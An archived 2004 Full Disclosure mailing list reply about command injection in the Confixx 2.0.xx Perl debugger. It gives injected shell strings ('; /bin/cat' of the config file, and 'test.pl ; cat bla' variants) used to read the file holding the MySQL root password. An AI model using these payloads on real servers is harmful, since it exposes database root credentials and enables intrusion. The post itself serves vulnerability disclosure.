Full Disclosure mailing list archives

Re: Confixx 2.0.xx SQL_Injections and reading MySQL Root-PW


From: "Tim" <tim () abenath de>
Date: Tue, 9 Mar 2004 16:41:53 +0100


Confixx Perl Debugger

using:

 ; /bin/cat location_of_Confixx_config_file


to read the config with MySQL Root-PW

okay, if you have safe_mode = on and do "cgi-bin/test.pl; cat bla" this
gives an error that cgi-bin/test.pl; does not exist.
If you do "cgi-bin/test.pl ; cat bla" the perldebugger works but will not
cat the file.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Current thread: